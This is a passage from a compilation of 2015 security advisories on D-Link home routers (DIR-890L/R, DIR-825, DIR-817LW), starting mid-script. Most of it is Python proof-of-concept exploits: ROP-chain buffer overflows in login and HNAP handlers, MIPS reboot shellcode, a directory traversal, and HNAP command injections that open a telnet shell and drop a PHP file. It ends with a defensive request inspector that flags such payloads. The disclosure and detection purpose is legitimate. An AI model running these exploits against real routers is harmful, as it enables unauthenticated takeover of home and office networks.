buf = "POST /hnap.cgi HTTP/1.1\r\nHOST: 10.0.0.90\r\nUser-Agent: test\r\nContent-Length: 13\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings\r\nHNAP_AUTH: test\r\nCookie: unsupportedbrowser=1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
buf+="FFFF"
buf+=struct.pack(">I",0x2abfc9f4) # s0 ROP 2 which loads S2 with sleep address
buf+="\x2A\xBF\xB9\xF4" #s1 useless
buf+=struct.pack(">I",0x2ac14c30) # s2 Sleep address
buf+="DDDD" #s3
buf+=struct.pack(">I",0x2ac0fb50) # s4 ROP 4 finally loads the stack pointer into PC
buf+=struct.pack(">I",0x2ac0cacc) # retn Loads s0 with ROP2 and ao with 2 for sleep
buf+="XXXXFFFFFFFFFFFFFFFFFFFFGGGGGGGG" #This is the padding as SP is added with 32 bytes in ROP 1
buf+="XXXXFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGG" # This is the padding as SP is added with 36 bytes in ROP 2
buf+=struct.pack(">I",0x2abcebd0) # This is the ROP 3 which loads S4 with address of ROP 4 and then loads S2 with stack pointer address
buf+="GGGGGGGGGGGGGGGG"
buf+="AAAAAAAAAAAAAAAAAAAAA" # Needs a proper shell code Bad chars 1,0 in the first bit of hex byte so 1x or 0x
buf+="GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ\r\n\r\n"+"test=test\r\n\r\n"
# Bad chars \x00 - \x20
# sleep address 2ac14c30
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 80))
s.send(buf)
data = s.recv(BUFFER_SIZE)
s.close()
print "received data:", data
```

Send email buffer overflow

```python
# Python 2 proof of concept
import socket
import struct
import string
import sys

BUFFER_SIZE = 2048

# Observe this in a emulator/debugger or real device/debugger
buf = "GET /send_log_email.cgi?test=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
buf+="1111" #s0 Loaded argument in S0 which is loaded in a0
buf+=struct.pack(">I",0x2ac14c30) #s4 Sleep address 0x2ac14c30
buf+="XXXX"
buf+="FFFF" # s3
buf+="XXXX"
buf+="BBBB" # s5
buf+="CCCC" # s6
buf+="DDDD" # s7
buf+="DDDD" # extra pad
buf+=struct.pack(">I",0x2ABE94B8) # Retn address 2ABE94B8 ROP1
buf+="EEEBBBBBBBBBBBBBBBBBBBBBBBBBBBBB" #
buf+="EEEBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB" #
buf+="XXXX" #
buf+="BBBBBBBBBBBBBBBB" #16 bytes before shellcode
buf+="CCCCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1\r\nHOST: 10.0.0.90\r\nUser-Agent: test\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 80))
s.send(buf)
data = s.recv(BUFFER_SIZE)
s.close()
print "received data:", data
```

## Report Timeline

* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor.
* Nov 13, 2015: A public advisory is sent to security mailing lists.

## Credit

This vulnerability was found by Samuel Huntley
-
D-Link DIR-890L/R - Multiple Buffer Overflow Vulnerabilities
## Advisory Information

Title: DIR-890L/R Buffer overflows in authentication and HNAP functionalities.
Date published: July 17th, 2015
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com (Dlink)
CVE: None
Note: All these security issues have been discussed with the vendor and the vendor indicated that they have fixed the issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060, http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061 However, the vendor has now taken the security advisory pages down, and hence the information needs to be publicly accessible so that users of these devices can update the router firmware. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.

## Product Description

DIR-890L/R -- AC3200 Ultra Wi-Fi Router. Mainly used by home and small offices.

## Vulnerabilities Summary

Have come across 2 security issues in DIR-880 firmware which allow an attacker to exploit buffer overflows in the authentication and HNAP functionalities. Both buffer overflows (auth and HNAP) can be exploited by an unauthenticated attacker. The attacker can be on the wireless LAN, or on the WAN if the management interface is exposed, to attack directly, or can use XSRF if it is not exposed. Also, this exploit needs to be run at least 200-500 times to bypass ASLR on ARM based devices. But it works, as the buffer overflow happens in a separate process from the web server, which does not allow the web server to crash, and hence the attacker wins.

## Details

Buffer overflow in auth

```python
# Python 2 proof of concept
import socket
import struct

buf = "GET /webfa_authentication.cgi?id="
buf+="A"*408
buf+="\x44\x77\xf9\x76" # Retn pointer (ROP1) which loads r0-r6 and pc with values from stack
buf+="sh;#"+"CCCC"+"DDDD" #R0-R2
buf+="\x70\x82\xFD\x76"+"FFFF"+"GGGG" #R3 with system address and R4 and R5 with junk values
buf+="HHHH"+"\xF8\xD0\xF9\x76" # R6 with crap and PC address loaded with ROP 2 address
buf+="telnetd%20-p%209092;#" #actual payload which starts telnetd
buf+="C"+"D"*25+"E"*25 + "A"*80 # 131 bytes of extra payload left
buf+="&password=A HTTP/1.1\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
```

Buffer overflow in HNAP

```python
# Python 2 proof of concept
import socket
import struct

#Currently the address of exit function in libraray used as $PC
buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + "\x10\xd0\xff\x76"+"B"*220
buf+= "\r\n" + "1\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
```

## Report Timeline

* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor.
* Nov 13, 2015: A public advisory is sent to security mailing lists.

## Credit

This vulnerability was found by Samuel Huntley
-
D-Link DIR-825 (vC) - Multiple Vulnerabilities
## Advisory Information

Title: DIR-825 (vC) Buffer overflows in authentication, HNAP and ping functionalities. Also a directory traversal issue exists which can be exploited
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com (Dlink)
CVE: None
Note: All these security issues have been discussed with the vendor and the vendor indicated that they have fixed the issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060, http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061 However, the vendor has now taken the security advisory pages down, and hence the information needs to be publicly accessible so that users of these devices can update the router firmware. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.

## Product Description

DIR-825 (vC) -- Wireless AC750 Dual Band Gigabit Cloud Router. Mainly used by home and small offices.

## Vulnerabilities Summary

Have come across 4 security issues in DIR-825 firmware which allow an attacker to exploit buffer overflows in the authentication, HNAP and ping functionalities, plus a directory traversal. The first 2 buffer overflows (auth and HNAP) can be exploited by an unauthenticated attacker. The attacker can be on the wireless LAN, or on the WAN if the management interface is exposed, to attack directly, or can use XSRF if it is not exposed. The ping buffer overflow and the directory traversal both require the attacker to be on the network: the ping buffer overflow is exploited via XSRF, whereas the directory traversal requires some sort of authentication, at least as a low-privileged user.

## Details

Buffer overflow in auth

```python
# Python 2 proof of concept
import socket
import struct

'''
287 + XXXX in query_string value, right now only working with Exit address as sleep address has bad chars
which disallows from using regular shellcode directly
'''
buf = "GET /dws/api/Login?test="
buf+="B"*251
buf+="CCCC" #s0
buf+="FFFF" #s1
buf+="FFFF" #s2
buf+="FFFF" #s3
buf+="XXXX" #s4
buf+="HHHH" #s5
buf+="IIII" #s6
buf+="JJJJ" #s7
buf+="LLLL"
buf+="\x2a\xbc\x8c\xa0" # retn address
buf+="C"*24 #
buf+="sh;;"
buf+="K"*20
buf+="\x2a\xc0\xd2\xa0" #s1
buf+="\x2a\xc0\xd2\xa0" #s1
buf +="CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC"
buf+="&password=A HTTP/1.1\r\nHOST: 10.0.0.90\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
soc=s.recv(2048)
print soc
```

Buffer overflow in HNAP

```python
# Python 2 proof of concept
import socket
import struct

'''
4138 + XXXX in SoapAction value, right now only working with Exit address as sleep address has bad chars
which disallows from using regular shellcode directly
'''
buf = "POST /HNAP1/ HTTP/1.1\r\n"
buf+= "Host: 10.0.0.90\r\n"
buf+="SOAPACTION:http://purenetworks.com/HNAP1/GetDeviceSettings/"+"A"*4138+"\x2a\xbc\x8c\xa0"+"D"*834+"\r\n"
buf+="Proxy-Connection: keep-alive\r\n"
buf+="Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==\r\n"
buf+="Cache-Control: max-age=0\r\n" # original read "buf+" (missing "="), which silently dropped this header
buf+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n"
buf+="User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\r\n"
buf+="Accept-Encoding: gzip,deflate,sdch\r\n"
buf+="Accept-Language: en-US,en;q=0.8\r\n"
buf+="Cookie: uid:1111;\r\n"
buf+="Content-Length: 13\r\n\r\ntest=test\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
soc=s.recv(2048)
print soc
```

Directory traversal

```python
# Python 2 proof of concept
import socket
import struct

'''
Useful to do directory traversal attack which is possible in html_response_page variable below which prints
the conf file, but theoretically any file, most likely only after login accessible
'''
payload="html_response_page=../etc/host.conf&action=do_graph_auth&login_name=test&login_pass=test1&login_n=test2&log_pass=test3&graph_code=63778&session_id=test5&test=test"
buf = "POST /apply.cgi HTTP/1.1\r\n"
buf+= "Host: 10.0.0.90\r\n"
buf+="Proxy-Connection: keep-alive\r\n"
buf+="Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==\r\n"
buf+="Cache-Control: max-age=0\r\n" # original read "buf+" (missing "="), which silently dropped this header
buf+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n"
buf+="User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\r\n"
buf+="Accept-Encoding: gzip,deflate,sdch\r\n"
buf+="Accept-Language: en-US,en;q=0.8\r\n"
buf+="Cookie: session_id=test5;\r\n"
buf+="Content-Length: "+str(len(payload))+"\r\n\r\n"
buf+=payload+"\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
soc=s.recv(2048)
print soc
```

Buffer overflow in ping

```python
# Python 2 proof of concept
import socket
import struct

'''
282 + XXXX in ping_ipaddr value, right now only working with Exit address as sleep address has bad chars
which disallows from using regular shellcode directly
'''
payload="html_response_page=tools_vct.asp&action=ping_test&html_response_return_page=tools_vct.asp&ping=ping&ping_ipaddr=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"+"\x2a\xbc\x8c\xa0"+"CCXXXXDDDDEEEE&test=test"
buf = "POST /ping_response.cgi HTTP/1.1\r\n"
buf+= "Host: 10.0.0.90\r\n"
buf+="Proxy-Connection: keep-alive\r\n"
buf+="Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==\r\n"
buf+="Cache-Control: max-age=0\r\n" # original read "buf+" (missing "="), which silently dropped this header
buf+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n"
buf+="User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\r\n"
buf+="Accept-Encoding: gzip,deflate,sdch\r\n"
buf+="Accept-Language: en-US,en;q=0.8\r\n"
buf+="Cookie: session_id=test5;\r\n"
buf+="Content-Length: "+str(len(payload))+"\r\n\r\n"
buf+=payload+"\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
soc=s.recv(2048)
print soc
```

## Report Timeline

* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor.
* Nov 13, 2015: A public advisory is sent to security mailing lists.

## Credit

This vulnerability was found by Samuel Huntley
-
D-Link DIR-817LW - Multiple Vulnerabilities
## Advisory Information

Title: DIR-817LW Buffer overflows and Command injection in authentication and HNAP functionalities
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com (Dlink)
CVE: None
Note: All these security issues have been discussed with the vendor and the vendor indicated that they have fixed the issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060, http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061 However, the vendor has now taken the security advisory pages down, and hence the information needs to be publicly accessible so that users of these devices can update the router firmware. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.

## Product Description

DIR-817LW -- Wireless AC750 Dual Band Cloud Router. Mainly used by home and small offices.

## Vulnerabilities Summary

Have come across 3 security issues in DIR-815 firmware which allow an attacker to exploit command injection and buffer overflows in the authentication and HNAP functionality. All of them can be exploited by an unauthenticated attacker. The attacker can be on the wireless LAN, or on the WAN if the management interface is exposed, to attack directly, or can use XSRF if it is not exposed.

## Details

Buffer overflow in auth

```python
# Python 2 proof of concept
import socket
import struct

#Reboot shellcode in there
buf = "GET /dws/api/Login?id="
buf+="A"*2064+"AAAA" #s0
# uclibc system address
buf+="\x2A\xAF\xD0\x84" #s1 -- points to iret
buf+="\x2A\xB1\x4D\xF0" #s2 -- points to sleep
buf+="\x2A\xB1\x4D\xF0"
buf+="\x2A\xB1\x4D\xF0"
buf+="\x2A\xB1\x4D\xF0"
buf+="\x2A\xB0\xDE\x54" # s6 filled up with pointer to rop4 which is ultimate mission
buf+="\x2A\xB1\x4D\xF0"
buf+="\x2A\xAC\xAD\x70" # Retn address ROP gadget 1 that loads into $a0
buf+="C"*36 #
buf+="\x2A\xAC\xD5\xB4" # points to rop3
#buf+="1"*17 # exit payload
buf+="E"*16
buf+="\x3c\x06\x43\x21\x34\xc6\xfe\xdc\x3c\x05\x28\x12\x34\xa5\x19\x69\x3c\x04\xfe\xe1\x34\x84\xde\xad\x24\x02\x0f\xf8\x01\x01\x01\x0c" #reboot big endian
buf+="Y"*120 # ROP gadget 2 that loads into $t9
buf+="&password=A HTTP/1.1\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\nContent-Length:5000\r\n\r\nid="+"A"*5000+"\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.1.8", 80))
s.send(buf)
```

Buffer overflow in HNAP

```python
# Python 2 proof of concept
import socket
import struct

# Working
buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ";sh;"+"B"*158
buf+="\x2A\xAF\xD0\x84" #s1 -- points to iret
buf+="\x2A\xB1\x4D\xF0" #s2 -- points to sleep
buf+="AAAA"+"AAAA"+"AAAA" #s3,s4,s5
buf+="\x2A\xB0\xDE\x54" # s6 filled up with pointer to rop4 which is ultimate mission
buf+="AAAA"
buf+="\x2A\xAC\xAD\x70" # Retn address ROP gadget 1 that loads into $a0
buf+="C"*36
buf+="\x2A\xAC\xD5\xB4" # points to rop3
buf+="C"*16
buf+="\x3c\x06\x43\x21\x34\xc6\xfe\xdc\x3c\x05\x28\x12\x34\xa5\x19\x69\x3c\x04\xfe\xe1\x34\x84\xde\xad\x24\x02\x0f\xf8\x01\x01\x01\x0c" #reboot big endian shell
buf+="B"*28+"\r\n" + "1\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.1.8", 80))
s.send(buf)
```

Command injection

```python
# Python 2 proof of concept
import socket
import struct

# CSRF or any other trickery, but probably only works when connected to network I suppose and internal
buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ';echo "<?phpinfo?>" > passwd1.php;telnetd -p 9090;test\r\n' + "1\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("1.2.3.4", 80))
s.send(buf)
```

## Report Timeline

* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor.
* Nov 13, 2015: A public advisory is sent to security mailing lists.

## Credit

This vulnerability was found by Samuel Huntley
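The command injections on this page (the SSDP ST header, the HNAP SOAPAction header, the ping_test parameters) and the overflows all share one shape: a header or parameter value is copied into a shell command or a fixed stack buffer without validation. Added here as an example, not code from the advisories or from D-Link: a Python 3 request inspector that parses an HTTP request or SSDP datagram (same wire format), flags shell metacharacters in the fields these advisories show reaching a shell and oversized values in the overflowed fields, checks the ST header against the search-target shapes UPnP defines, and shows the input check a ping CGI should apply. The sink names, the 512-byte threshold and the sample messages are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed assumptions: fields the advisories show reaching a shell
# (SSDP ST, HNAP SOAPAction, ping_test user name, ping_ipaddr) or a fixed
# stack buffer (SOAPAction, Cookie, id/test query parameters), and a length
# no legitimate value of those fields should reach.
SHELL_SINKS = {"st", "soapaction", "admin3_user_name", "ping_ipaddr"}
OVERFLOW_SINKS = {"soapaction", "cookie", "id", "test"}
MAX_LEN = 512

SHELL_META = re.compile(r"[;&|`$<>\n\r]")
# Search-target shapes a legitimate M-SEARCH may carry (UPnP Device Architecture 1.0)
ST_OK = re.compile(
    r"^(ssdp:all|upnp:rootdevice|uuid:[0-9A-Za-z-]+"
    r"|urn:[0-9A-Za-z.-]+:(device|service):[0-9A-Za-z.-]+:\d+)$"
)
IPV4 = re.compile(r"^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$")


def parse_request(raw: bytes):
    """Split an HTTP request or SSDP datagram into (method, target, headers, body);
    header names are lower-cased, values are left exactly as received."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target = (lines[0].split(" ", 2) + ["", ""])[:2]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body.decode("latin-1")


def split_params(encoded: str):
    """Split a query string or form body on '&' only, so a ';' inside a value
    (the injection separator in these advisories) stays visible to the checks."""
    for pair in encoded.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            yield unquote_plus(name).lower(), unquote_plus(value)


def inspect(raw: bytes):
    """Return the findings for one request or datagram (empty list = clean)."""
    method, target, headers, body = parse_request(raw)
    fields = list(headers.items())
    fields += split_params(urlsplit(target).query)
    fields += split_params(body)
    findings = []
    for name, value in fields:
        if name in SHELL_SINKS and SHELL_META.search(value):
            findings.append("shell metacharacter in " + name)
        if name in OVERFLOW_SINKS and len(value) > MAX_LEN:
            findings.append("oversized %s (%d bytes)" % (name, len(value)))
    if method == "M-SEARCH" and "st" in headers and not ST_OK.match(headers["st"]):
        findings.append("malformed ST search target")
    return findings


def valid_ping_target(value: str) -> bool:
    """The check a ping CGI should apply before the target reaches any command:
    accept a dotted-quad IPv4 address and nothing else (no shell involved)."""
    m = IPV4.match(value)
    return bool(m) and all(int(octet) <= 255 for octet in m.groups())


# Constructed sample traffic (RFC 5737 addresses), not captures from real devices.
SAMPLES = {
    "ssdp_clean": (b'M-SEARCH * HTTP/1.1\r\nHOST:239.255.255.250:1900\r\n'
                   b'ST:urn:schemas-upnp-org:service:WANIPConnection:1\r\n'
                   b'MX:2\r\nMAN:"ssdp:discover"\r\n\r\n'),
    "ssdp_injected": (b'M-SEARCH * HTTP/1.1\r\nHOST:239.255.255.250:1900\r\n'
                      b'ST:urn:schemas-upnp-org:service:WANIPConnection:1;echo x\r\n'
                      b'MX:2\r\nMAN:"ssdp:discover"\r\n\r\n'),
    "hnap_oversized": (b"POST /HNAP1/ HTTP/1.0\r\nHOST: 192.0.2.1\r\nContent-Length: 1\r\n"
                       b"SOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/"
                       + b"A" * 2000 + b"\r\n\r\n1"),
    "login_oversized": (b"GET /dws/api/Login?id=" + b"A" * 2064
                        + b"&password=A HTTP/1.1\r\nHOST: 192.0.2.1\r\n\r\n"),
    "ping_injected": (b"POST /my_cgi.cgi HTTP/1.0\r\nHOST: 192.0.2.1\r\n\r\n"
                      b"request=ping_test&admin3_user_name=192.0.2.5;echo x"
                      b"&admin4_user_pwd=x&user_type=0"),
}

if __name__ == "__main__":
    for label, raw in SAMPLES.items():
        print(label, "->", inspect(raw) or "clean")
```

Run against a packet capture or web-server log from the LAN side, the same checks give a detection signal for the unauthenticated SSDP and HNAP cases, which leave no authentication event behind.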